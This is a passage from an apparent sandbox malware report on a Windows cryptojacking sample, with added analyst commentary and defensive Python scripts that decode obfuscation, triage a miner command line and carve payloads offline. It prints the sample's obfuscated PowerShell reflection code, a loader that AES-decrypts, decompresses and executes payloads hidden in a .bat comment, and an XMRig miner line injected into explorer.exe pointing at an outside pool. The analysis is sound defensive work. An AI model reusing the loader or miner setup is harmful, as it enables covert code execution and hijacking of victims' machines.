har](117)+'a'+[char](108)+'',$mbxclwmzji,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+'u'+''+'n'+''+[char](116)+''+'i'+''+'m'+''+[char](101)+''+[char](44)+''+[char](77)+'a'+[char](110)+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');write-output $qsxeicuzieu.createtype();}$xabpoaxizgegr=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+'l')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+[char](114)+''+'o'+''+'s'+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+''+[char](105)+'n32'+[char](46)+'uns'+'a'+''+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+'m'+[char](101)+''+[char](116)+'h'+[char](111)+'d'+[char](115)+'');$onnlowkafauoge=$xabpoaxizgegr.getmethod(''+'g'+''+[char](101)+''+[char](116)+''+'p'+'r'+[char](111)+''+[char](99)+'a'+[char](100)+''+'d'+''+[cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:nyguwfckeoje{param([outputtype([type])][parameter(position=0)][type[]]$kiydauqzmkkpvq,[parameter(position=1)][type]$ozrvwwezvx)$jczrwmspqgk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+[char](101)+''+'c'+'t'+[char](101)+''+[char](100)+''+'d'+'e'+'l'+''+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('in'+[char](77)+'e'+[char](109)+''+[char](111)+'ry'+[char](77)+''+'o'+''+'d'+'u'+[char](108)+''+'e'+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'a'+[char](116)+''+[char](101)+''+[char](84)+'yp'+'e'+'',''+'c'+''+'l'+''+'a'+''+'s'+'s,p'+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c'+','+''+[char](83)+''+[char](101)+''+'a'+'le'+'d'+''+[char](44)+''+'a'+''+[char](110)+''+[char](115)+''+[char](105)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+'s'+[char](44)+''+[char](65)+'u'+'t'+'o'+[char](67)+''+'l'+''+'a'+'ss',[multicastdelegate]);$jczrwmspqgk.defineconstructor('rt'+[char](83)+''+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+'a'+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+'e'+','+'h'+'i'+[char](100)+'e'+[char](66)+''+[char](121)+''+[char](83)+'ig'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$kiydauqzmkkpvq).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+'ime,'+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$jczrwmspqgk.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'',''+[char](80)+''+[char](117)+''+'b'+''+'l'+''+[char](105)+''+[char](99)+','+[char](72)+''+'i'+''+[char](100)+''+'e'+'b'+'y'+''+[c
har](83)+''+[char](105)+''+[char](103)+','+'n'+''+[char](101)+'w'+[char](83)+''+'l'+''+[char](111)+''+[char](116)+''+','+'v'+[char](105)+'rt'+[char](117)+''+[char](97)+''+[char](108)+'',$ozrvwwezvx,$kiydauqzmkkpvq).setimplementationflags('r'+'u'+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+'a'+'ge'+'d'+'');write-output $jczrwmspqgk.createtype();}$fmzqsfzpmgsno=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+''+[char](115)+''+[char](116)+'em'+'.'+''+[char](100)+'ll')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+'o'+''+'f'+''+[char](116)+'.'+[char](87)+'in'+[char](51)+''+[char](50)+''+[char](46)+''+'u'+'ns'+'a'+''+'f'+''+'e'+''+[char](78)+''+'a'+'t'+[char](105)+''+'v'+'em'+[char](101)+''+[char](116)+''+'h'+'o'+[char](100)+''+[char](115)+'');$kczxemormgvaoj=$fmzqsfzpmgsno.getmethod(''+[char](71)+''+[char](101)+''+'t'+''+[
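The two powershell.exe command lines above are the usual reflection route to native code without Add-Type: a delegate type is emitted at runtime (DefineDynamicAssembly / DefineDynamicModule / DefineType over MulticastDelegate with an Invoke method), and Microsoft.Win32.UnsafeNativeMethods is pulled out of System.dll to reach GetProcAddress (the report cuts the GetMethod argument off after the characters that decode to getprocadd). Every identifying string is hidden as a run of 'literal'+[char](N)+... pieces. The decoder below is an added example, not code from the report or from the sample; it collapses those runs statically, by regex, without evaluating any PowerShell. One caveat that the report itself shows: literal text in these command lines has been case-folded (the delegate assembly is spelled 'd'+'e'+'l' where the same name built from [char](68) keeps its capital D), while [char](N) codes keep their case, so decoded strings come out mixed-case and should be matched case-insensitively against the real names (ReflectedDelegate, InMemoryModule, MyDelegateType, Microsoft.Win32.UnsafeNativeMethods).

```python
import re

# One string atom as this obfuscator emits it: a single-quoted PowerShell literal
# ('' inside it is an escaped quote) or a [char](N) cast.
_ATOM = r"(?:'(?:[^']|'')*'|\[char\]\(\d+\))"
# A maximal run of two or more atoms glued together with '+'.
_RUN = re.compile(rf"{_ATOM}(?:\s*\+\s*{_ATOM})+", re.IGNORECASE)
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[char\]\((\d+)\)", re.IGNORECASE)


def decode_run(expr: str) -> str:
    """Evaluate one 'a'+[char](98)+'c' run to the plain string it builds."""
    parts = []
    for m in _TOKEN.finditer(expr):
        if m.group(1) is not None:          # quoted literal, unescape ''
            parts.append(m.group(1).replace("''", "'"))
        else:                                # [char](N) cast
            parts.append(chr(int(m.group(2))))
    return "".join(parts)


def collapse(script: str) -> str:
    """Rewrite every concatenation run in a script as a single quoted literal."""
    def repl(m):
        return "'" + decode_run(m.group(0)).replace("'", "''") + "'"
    return _RUN.sub(repl, script)


def decoded_strings(script: str):
    """Only the recovered strings, in script order, for quick triage."""
    return [decode_run(m.group(0)) for m in _RUN.finditer(script)]


# Fragments copied verbatim from the first powershell.exe command line in the report.
ASSEMBLY_NAME = ("'r'+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''"
                 "+[char](99)+''+[char](116)+'e'+[char](100)+''+[char](68)+'e'"
                 "+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+''")
TARGET_TYPE = ("''+[char](77)+''+[char](105)+''+[char](99)+''+[char](114)+''+'o'+''"
               "+'s'+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+''+[char](105)"
               "+'n32'+[char](46)+'uns'+'a'+''+[char](102)+''+[char](101)+''"
               "+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''"
               "+[char](101)+'m'+[char](101)+''+[char](116)+'h'+[char](111)+'d'"
               "+[char](115)+''")

if __name__ == "__main__":
    print(decode_run(ASSEMBLY_NAME))   # reflectedDelegate (case-folded 'r', see lead-in)
    print(decode_run(TARGET_TYPE))     # Microsoft.win32.unsafeNativemethods
    print(collapse("gettype(" + TARGET_TYPE + ")"))
```

Run collapse over the whole command line to get a readable script, or decoded_strings to get just the names for a YARA or Sigma string list; because the runs are matched by pattern rather than executed, the decoder is safe to point at any captured command line.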
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth
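The explorer.exe record above is the miner itself: an XMRig command line (RandomX, --algo="rx/0", pool pool.hashvault.pro on port 80) running under the name of a Windows shell binary with conhost.exe as its parent, which matches the injection signatures listed for this sample, and carrying --cinit-* options that stock XMRig does not have (they belong to the modified build SilentXMRMiner ships; --cinit-stealth-targets is that build's own configuration and is opaque as printed). The script below is an added triage example, not code from the report or the sample: it parses such a command line and reports the things an analyst checks first. It also flags a limitation of this report: command lines are case-folded, and the --user wallet as printed has no uppercase characters, so the address is not usable as an indicator verbatim.

```python
from typing import Dict, List, Optional, Tuple

# Copied from the report's explorer.exe record (case-folded there, see lead-in).
MINER_CMDLINE = r'c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth'


def tokenize(cmdline: str) -> List[str]:
    """Split on whitespace, honouring double quotes and leaving Windows backslashes alone."""
    tokens, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_cmdline(cmdline: str) -> Tuple[str, Dict[str, str]]:
    """Return (image path, {option: value}); bare flags such as -b map to ''."""
    toks = tokenize(cmdline)
    opts: Dict[str, str] = {}
    for tok in toks[1:]:
        if tok.startswith("-"):
            key, _, value = tok.partition("=")
            opts[key] = value
    return toks[0], opts


def pool_endpoint(url: str) -> Tuple[str, Optional[int]]:
    """host:port from a bare 'host:port' or a 'stratum+tcp://host:port' URL."""
    hostport = url.split("://")[-1]
    host, sep, port = hostport.rpartition(":")
    if not sep or not port.isdigit():
        return hostport, None
    return host, int(port)


def assess(cmdline: str) -> List[str]:
    """Triage findings for a suspected XMRig command line."""
    image, opts = parse_cmdline(cmdline)
    findings = []
    base = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if base != "xmrig.exe":
        # miner options under another binary's name: injected or hollowed process
        findings.append(f"miner arguments under non-miner image {base}")
    if any(k.startswith("--cinit-") for k in opts):
        findings.append("--cinit-* options present (SilentXMRMiner build, not stock XMRig)")
    if "--url" in opts:
        host, port = pool_endpoint(opts["--url"])
        if port in (80, 443):
            findings.append(f"stratum pool {host} reached on web port {port}")
    wallet = opts.get("--user", "")
    if wallet and wallet == wallet.lower():
        findings.append("wallet has no uppercase characters; likely case-folded by the log, not usable verbatim")
    return findings


if __name__ == "__main__":
    for line in assess(MINER_CMDLINE):
        print(line)
```

The same function applied to a benign-looking line such as a real xmrig.exe on port 3333 with a mixed-case wallet returns no findings, which is the point: the signal here is the image name, the port and the fork-specific options, not the mere presence of a miner.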
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
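The two cmd.exe /c echo records above are one loader run twice, once from %TEMP%\b.bat and once from the persistence copy C:\Windows\$rbx-onimai2\$rbx-co2.bat. With the blck junk tokens stripped it reads: open the .bat it was started from, take the first line beginning with ':: ' (a batch comment, so the file still runs as a script), split that line on '\' into two Base64 blobs, decrypt each with AES in CBC mode and PKCS#7 padding using the hard-coded key and IV, gunzip the result, load it with [System.Reflection.Assembly]::Load and call EntryPoint.Invoke. The Python below is an added triage script, not code from the report or the sample, that reproduces those unpacking steps so the embedded .NET payloads can be carved from the .bat without running it. The report's command lines are case-folded, so the key and IV as printed there are not usable; take both from the dropped .bat itself. AES is done through the third-party cryptography package when present; every other step is standard library, and the decrypt step is a pluggable callable so the pipeline can be exercised on the constructed sample included below.

```python
import base64
import gzip
from typing import Callable, List

Decryptor = Callable[[bytes], bytes]

# One invoke-expression fragment copied from the loader, to show the junk-token layer.
JUNK_SAMPLE = "$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);"


def strip_junk(ps_source: str, junk: str = "blck") -> str:
    """Undo the '...'.replace('blck', '') layer so the loader reads as plain PowerShell."""
    return ps_source.replace(junk, "")


def marker_line(bat_text: str, marker: str = ":: ") -> str:
    """Payload carried after the first ':: ' comment, exactly as the loader selects it."""
    for line in bat_text.splitlines():
        if line.startswith(marker):
            return line[len(marker):]
    raise ValueError("no ':: ' payload line found")


def unpad_pkcs7(buf: bytes, block: int = 16) -> bytes:
    """Remove PKCS#7 padding; reject malformed padding instead of guessing."""
    if not buf or len(buf) % block:
        raise ValueError("length is not a multiple of the block size")
    n = buf[-1]
    if not 1 <= n <= block or buf[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return buf[:-n]


def pad_pkcs7(buf: bytes, block: int = 16) -> bytes:
    """PKCS#7 padding, used only to build the constructed sample below."""
    n = block - len(buf) % block
    return buf + bytes([n]) * n


def aes_cbc_decryptor(key_b64: str, iv_b64: str) -> Decryptor:
    """Decrypt step with key/IV taken from the .bat; requires the 'cryptography' package."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    key, iv = base64.b64decode(key_b64), base64.b64decode(iv_b64)

    def decrypt(data: bytes) -> bytes:
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return unpad_pkcs7(dec.update(data) + dec.finalize())
    return decrypt


def carve_payloads(bat_text: str, decrypt: Decryptor) -> List[bytes]:
    """Base64 -> AES-CBC -> gzip for every '\\'-separated blob on the marker line."""
    blobs = marker_line(bat_text).split("\\")
    return [gzip.decompress(decrypt(base64.b64decode(b))) for b in blobs]


def is_pe(buf: bytes) -> bool:
    """The loader hands the result to Assembly.Load, so a carved blob should be a PE."""
    return buf[:2] == b"MZ"


# Constructed sample, not a real dropped file: a .bat whose ':: ' line carries two
# gzip-compressed, PKCS#7-padded blobs. unpad_pkcs7 stands in for AES as the
# "decryptor" so the pipeline runs offline without the real key.
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"PE\x00\x00 constructed sample, not a real assembly"
SAMPLE_BLOB = base64.b64encode(pad_pkcs7(gzip.compress(SAMPLE_PAYLOAD))).decode()
SAMPLE_BAT = "@echo off\r\n:: " + SAMPLE_BLOB + "\\" + SAMPLE_BLOB + "\r\nexit /b\r\n"

if __name__ == "__main__":
    print(strip_junk(JUNK_SAMPLE))
    for i, blob in enumerate(carve_payloads(SAMPLE_BAT, unpad_pkcs7)):
        print(i, len(blob), "PE" if is_pe(blob) else "not PE")
```

Against the real dropped .bat, pass aes_cbc_decryptor(key, iv) with the Base64 key and IV read from the file in place of unpad_pkcs7 and write each carved blob to disk for the usual .NET analysis. The backslash separator is safe for the loader because it never occurs in Base64, which is also why a split on '\' reliably recovers exactly two blobs here.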
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,94_2_0000000140002300
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91C2AF0 cpuid 18_3_0000025EE91C2AF0
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeQueries volume information: C:\Users\user\Desktop\e7WMhx18XN.exe VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
        Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
